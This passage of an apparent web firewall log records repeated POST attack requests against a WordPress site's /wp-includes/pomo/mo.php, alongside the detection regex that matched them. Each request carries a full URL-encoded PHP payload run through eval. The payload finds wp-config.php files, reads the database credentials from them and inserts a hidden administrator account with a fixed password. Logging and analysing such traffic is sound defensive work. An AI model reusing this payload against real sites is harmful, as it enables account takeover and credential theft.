Safari\/537.36\nsec-ch-ua-platform:\"Windows\"\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-site:none\naccept:*\/*\nsec-fetch-mode:navigate\n\nurOhQZ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 00:07:56","213.209.159.254","POST","\/wp-includes\/pomo\/mo.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> HaFMzo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/pomo\/mo.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\ncontent-length:12663\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nhost:dewenlabels.com\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nsec-ch-ua-platform:\"Windows\"\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-site:none\naccept:*\/*\nsec-fetch-mode:navigate\n\nHaFMzo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20